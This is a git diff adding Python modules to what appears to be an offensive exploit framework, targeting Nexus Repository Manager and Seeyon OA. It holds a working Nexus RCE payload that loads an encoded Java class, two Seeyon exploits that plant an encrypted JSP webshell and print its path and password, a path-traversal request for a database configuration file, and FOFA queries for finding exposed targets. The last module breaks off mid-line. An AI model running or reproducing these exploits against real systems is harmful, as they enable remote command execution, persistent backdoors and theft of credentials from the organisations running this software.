+AUTHOR="RabbitMask" +REMARK='Nexus RCE' +FOFA_RULE='app="Nexus-Repository-Manager"' +###################################################### + +def poc(target): + result={} + cmd = 'whoami' + if target[-1] == '/': + vuln_url = target + "service/extdirect" + else: + vuln_url = target + "/service/extdirect" + + headers = { + 'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0", + 'Accept': "*/*", + 'Content-Type': "application/json", + 'X-Requested-With': "XMLHttpRequest", + 'Content-Length': "7244", + 'Connection': "close", + 'Cache-Control': "no-cache" + } + + payload = "{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n y,\\n 'Exploit.Test234',\\n z.getBytes('latin1'), 0,\\n 3054\\n);x.getMethod('test', ''.class).invoke(null, '%s');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}" % cmd + r = requests.post(vuln_url, data=payload, headers=headers, verify=False) + if r.status_code == 200 and len(r.text) < 100 and len(r.text) > 0: + result['target'] = target + result['poc'] = NAME + result['whoami'] = r.text + return result + + +def exp(target,cmd): + if target[-1] == '/': + vuln_url = target + "service/extdirect" + else: + vuln_url = target + "/service/extdirect" + + headers = { + 'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0", + 'Accept': "*/*", + 'Content-Type': "application/json", + 'X-Requested-With': "XMLHttpRequest", + 'Content-Length': "7244", + 'Connection': "close", + 'Cache-Control': "no-cache" + } + + payload = "{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n y,\\n 'Exploit.Test234',\\n z.getBytes('latin1'), 0,\\n 3054\\n);x.getMethod('test', ''.class).invoke(null, '%s');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}" % cmd + r = requests.post(vuln_url, data=payload, headers=headers, verify=False) + if r.status_code == 200: + print(r.text) + + +if __name__ == '__main__': + # exp() + pass \ No newline at end of file diff --git a/Moudle/Seeyon/CNVD_2019_19299.py b/Moudle/Seeyon/CNVD_2019_19299.py new file mode 100644 index 0000000..61803a2 --- /dev/null +++ b/Moudle/Seeyon/CNVD_2019_19299.py @@ -0,0 +1,52 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import sys +import requests +import base64 +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CNVD-2019-19299' +AUTHOR="Joker" +REMARK='致远OA A8 htmlofficeservlet RCE ' +FOFA_RULE='title="致远A8-V5协同管理软件 V6.1sp1"' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/seeyon/htmlofficeservlet" + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if r.status_code==200 and 'htmoffice' in r.text: + result['target'] = target + result['poc'] = NAME + return result + except: + pass + +def exp(target): + print('[#]开始写入webshell') + vuln_url= target + "/seeyon/htmlofficeservlet" + payload="REJTVEVQIFYzLjAgICAgIDM1MSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNTMzICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVgpPUFRJT049UzNXWU9TV0xCU0dyCmN1cnJlbnRVc2VySWQ9elVDVHdpZ3N6aUNBUExlc3c0Z3N3NG9Fd1Y2NgpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYKUkVDT1JESUQ9cUxTR3c0U1h6TGVHdzRWM3dVdzN6VW9Yd2lkNgpvcmlnaW5hbEZpbGVJZD13VjY2Cm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2CkZJTEVOQU1FPXFmVGRxZlRkcWZUZFZheEplQUpRQlJsM2RFeFF5WU9kTkFsZmVheHNkR2hpeVlsVGNBVGRPUldaTjF5dmRSMzVuSHpzCm5lZWRSZWFkRmlsZT15UldaZEFTNgpvcmlnaW5hbENyZWF0ZURhdGU9d0xTR1A0b0V6TEtBejQ9aXo9NjYKPCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iM2M5NjFmNDlkNWZhOTZjNSI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYyhrLmdldEJ5dGVzKCksIkFFUyIpKTtuZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwobmV3IHN1bi5taXNjLkJBU0U2NERlY29kZXIoKS5kZWNvZGVCdWZmZXIocmVxdWVzdC5nZXRSZWFkZXIoKS5yZWFkTGluZSgpKSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KTt9JT42ZTRmMDQ1ZDRiODUwNmJmNDkyYWRhN2UzMzkwZDdjZQ==" + data = base64.b64decode(payload) + headers = { + "User-Agent": ua, + "Content-Type": "application/x-www-form-urlencoded", + } + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.post(url=vuln_url,headers=headers,data=data,verify=False,timeout=5) + if r.status_code==500 and '"message":null' in r.text: + print('[+]成功写入webshell') + print('[+]默认冰蝎Webshell地址(szxsd):' + target + '/seeyon/Faltform.jsp') + else: + print('写入webshell失败!') + +if __name__ == '__main__': + poc("https://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Seeyon/CNVD_2020_62422.py b/Moudle/Seeyon/CNVD_2020_62422.py new file mode 100644 index 0000000..cc3434a --- /dev/null +++ b/Moudle/Seeyon/CNVD_2020_62422.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua, headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CNVD_2020_62422' +AUTHOR="Joker" +REMARK='致远OA webmail.do任意文件下载检测' +FOFA_RULE='title="致远' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if 'workflow.dialect' in r.text and r.status_code==200: + result['target'] = target + result['poc'] = NAME + return result + except: + pass + +if __name__ == '__main__': + poc('http://127.0.0.1') \ No newline at end of file diff --git a/Moudle/Seeyon/CNVD_2021_01627.py b/Moudle/Seeyon/CNVD_2021_01627.py new file mode 100644 index 0000000..50331c6 --- /dev/null +++ b/Moudle/Seeyon/CNVD_2021_01627.py @@ -0,0 +1,50 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import sys +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CNVD-2021-01627' +AUTHOR="Joker" +REMARK='致远OA ajax.do登录绕过 任意文件上传' +FOFA_RULE='title="致远"' +###################################################### + +def poc(target): + result = {} + test_url1 = target + "/seeyon/thirdpartyController.do.css/..;/ajax.do" + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=test_url1, headers=headers, verify=False, timeout=5) + if 'java.lang.NullPointerException:null' in r.text: + result['target'] = target + result['poc'] = NAME + return result + except: + pass + +def exp(target): + print('\033[32m[#]开始写入webshell') + test_url2 = target + "/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip" + headers={ + "User-Agent": ua, + "Content-Type": "application/x-www-form-urlencoded", + } + data="managerMethod=validate&arguments=%1F%C2%8B%08%00%C3%9F%C2%8B%C3%B6%60%00%C3%BFuT%5Bs%C2%AA%C3%88%13%7F%C3%9FOa%C3%B9bR9k%10%C3%A4%18%C3%BF%C2%A7%C3%B6%21%5E%40D%C2%89%C2%82r%C3%BB%C3%97%3E%C3%80%0C%C3%A1%C3%A2%0C%C2%B0%0E%20c%C3%AA%7C%C3%B73%C2%80%C2%A9%C3%A4%C3%94fy%C2%99%C2%9E%C2%A6%C3%BB7%C3%9D%C2%BF%C2%BE%C3%BC%C3%BFm%C3%B0%C2%9A%C2%9Dq%C2%89%C2%BC%03%C3%8D%C2%83%C3%81%C3%BFz%C2%A3o%C2%BDw%C2%8D%C3%A6%C3%A1F3%28%02R%0C%3E%C3%94%C3%8B%3A%3F%07%C2%84%C3%84Y%C3%9A%C3%BC4%C2%8As%C2%9C%C2%86%C2%BD%C3%9C%2B%C2%A2%C3%9E%5F%C2%BD%C3%BEp%C3%B8x%09%7C%2F%C3%8F%C3%89%23%09%02%C2%9A%C2%A5%C2%8F%C3%BD%1F%7F%C3%B4n%5F%C3%A2U%C3%9E0%C3%8E%C2%86%3B%C3%A6RX%C3%A7%C2%B8%08%C3%8E%C2%BD%C3%BCC%C3%A6%19%40%1A%5C%C2%BE2%C2%BBk%C3%B0%1F%C3%BA%C2%92%C2%87%C2%8A%26%C2%8AaB%C3%B2%C2%BA%7F%C3%BF%C2%81%7C%C2%8B%C2%82D%01BM%18%3B9%C2%BF%C2%82EN%7D%7E%C3%8A%29%C2%AB%C2%A8%C3%B0e%C3%B1%C3%BA%C2%82%1B%1D%17%7B%2B%C2%9D%03%C2%8B%C2%AC%C3%9A%C3%B0y%04%C3%B1%C2%B2%04%C2%82Yn%C2%B0V%C3%B9%C3%86T%3D%C2%8E%C2%9E%C2%AB%C2%A3%2C%C2%A5%C2%AE%C2%A1%C2%84%10%C2%9B%14%C3%B0%C2%A8%C3%B2%13%2E%C3%9E%1Ac%C2%AA%24%C3%A3%27%2F%C3%95%2E%2FX%C3%8F%016%13%28%23%C3%9E5%C3%84%C2%8BcA%C2%A4%C3%88%C2%A8%00%C3%B2%C2%94%C3%82%06%1FK%C2%BCc%C2%88%23%C3%B6%C2%9Fl%C3%A2%C2%8C%C2%B4w%3B%2C%1Da%2D%C2%82%C2%95%5E%7D%C2%A9c%C2%B8%C2%AE%C2%B5%2D%C3%95X%C2%A9vI%C3%BD%0F%10%C2%9E%C2%BF%C2%BB%C2%B2%C2%99%C3%B8%C2%B2D%1D%5B%C3%8F%7D%7E%C3%BC%C2%A0%C3%88%1Aql%C3%AD%C2%AAH%C3%87%C3%90%C2%B5%23%C3%8E%C2%B5%C3%84%13%C2%A0%C2%B3%05%C2%B3%C2%B9%02%C2%AE%C2%AE%1CKG%20%2DLu%C3%99%C3%99%1D%C3%A4i%C3%840%C2%A8%22o%C3%B3%40%C3%90F%C2%80%C3%89%2A%C2%93%5F%C2%84%C3%91%05Zk%C3%A2Y%C3%9Bp%C3%8F%C3%97%11%10%C2%B6%C2%A1K%C2%A38%C2%B0u%C2%A4H%05tb4a%C3%B9q%C3%90%5E%C2%97%C3%8A%C2%AA%C3%B3%C3%9B%60%1D%C2%B9%18%C2%95%C3%AE%C2%B1%C3%83Ve%C2%85l%C3%A7u%C2%BC%C3%815%C3%B21%C3%A4%C2%BC%C3%B9i%C3%B2jsO%C2%8C%C3%93%C2%86%C3%B7%C2%93k5v%C3%AB%C2%88q%C3%80%C3%B8%C2%BB%C3%B1%C2%96j%09%C3%80%C3%A8%02%C3%A5%1A%C3%81%C2%85x%C2%80%C2%ABu%C3%AEc%10zW%C3%86%2F%C2%BF%15%C2%B5D%C3%82%C3%9A%02%C2%9D4%C3%8B%C2%8D%5E%0En%C2%A2%19%C3%8A%04%C3%B0%C3%A6%C2%B5%C2%ADA%2C%5E%C2%A0%C2%AD%5B%C2%8EU%C2%8F%5C%23%C2%8C%C2%A1%C2%A1%10%C2%8F%C2%9E%26%7B%1E%5D%C2%BC%2E%C3%87%C3%A9%C2%BB%C2%BC%C3%81%10%C3%81%25bu%C3%95%23%1FkH%C2%9D%C2%AFg%C2%BA%C2%B9%C2%8D%C3%95C%C2%91lX%0E%C2%9E%C2%BD%C3%8F%C2%B6q%5D%C2%BA6%08%C2%8F%C2%BC%C3%89b29%C2%837%C3%85%C2%A30C%0E%0D%C2%B3Oo%C2%A6%C3%AE%C3%AFo%C3%A6%2AUb%C3%95h%C3%B5%C3%B3%C2%86%2F%40%C3%83%7C%C3%B3%C2%8Eo%C2%9C%26%3E6%05V%C2%9F%0C%C3%8AQ%0Ehk%C3%97%C3%95%C2%A7%C2%B1k%C3%A3%C3%BA%C2%BD6%C3%AA%C3%BC%C3%84%C3%B4%20s%C2%A8x%C3%B29%C2%97%C3%B1%21%11U%16%11%C2%A4%C2%B3%2B%C2%B4%C3%86%C2%A5o%C2%A1%2B%C3%BB7%C3%9F%C2%9B%C2%9A%C2%A4%25%C3%BA%C2%92%C3%B1Z%C3%9D%C3%BC%C3%8A%C2%B6%3Fx%1D%C3%ADS%13%C2%BB%C2%ACW%C3%95%C3%95%1A%01%C3%9BD%40%C3%98%C2%97%2EorGl%C2%BE%C2%BFQ%C2%B2%1C%23%C2%97%0D%C2%AE%C2%8F%C2%8F%19%C2%8B3g9%C2%B0%C3%BC%C3%A1%C3%9AO5%C3%8E%C2%B1%C3%84%C2%84%C3%A5%C3%87%C3%A20khI%04%C3%90%C2%A8%C3%AD%C3%A9%3D%3F%2D%C2%A1l%C2%8E%21%C2%AB%C3%ADn%3Em%7B%12%C3%B0%1A%C3%B5%C3%AC%19%C3%A7%C3%8B%26%C2%B7K%2EUW%C3%97u%C3%A5%0B%C3%BB%C2%87O%C2%83N%C3%8At%C2%88c%02%C2%86%C2%B3gc%C3%B9%7D%C2%BC%08%40%06%C3%99%C2%AC%C3%83%C3%9B%C3%99%C2%8D%C3%B9%C3%97Fw%C3%BF%C2%9E%C3%AA%C3%8E%C3%ADv%C3%A9%7C%C2%BB%C3%8B%C3%9D%0Dp%C3%98%C2%9D%C2%B3%C3%B2%C3%B5%C2%95%01%C2%B4K%C3%A0%C3%BE%5B%C3%BFx%C2%90%C3%BE%7C%C3%BA%C2%BC%24%3E%C2%AF%C2%9Aa%7BA%C3%A9%0D%C2%A2%C3%83%C3%BB%2F%5B%C2%802%12%C2%B0%C3%80%7E%C3%BEhV%21%13%60%C3%B0%C3%9A%23%C2%85W%C3%84%C2%A0W%C3%97%C3%B5%C3%9D%C3%BD%C3%9B%C3%A0%27%C3%9B%C2%8FlG%C2%BE5gq%2E%C2%83%C3%81%C3%9F%C2%BF%00%26%C2%ABR%C3%89Z%05%00%00" + r = requests.post(url=test_url2,headers=headers,data=data,verify=False,timeout=5) + if r.status_code==500 and '"message":null' in r.text: + print('\033[32m[#]成功写入webshell') + print('webshell地址:'+target+'/seeyon/Faltform.jspx'+'\n'+'[32m[#]密码:szxsd') + else: + print('[32m[#]写入webshell失败') + + +if __name__ == '__main__': + poc("https://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Seeyon/Information_seeyou.py b/Moudle/Seeyon/Information_seeyou.py new file mode 100644 index 0000000..aba7610 --- /dev/null +++ b/Moudle/Seeyon/Information_seeyou.py @@ -0,0 +1,63 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua, headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='Seeyon_OA_Info_Leak' +AUTHOR="Joker" +REMARK='致远OA 敏感信息泄露' +FOFA_RULE='title="致远A8+协同管理软件.A6"' +###################################################### + +def poc(target): + result = {} + vuln_url1 = target + "/yyoa/createMysql.jsp" + vuln_url2 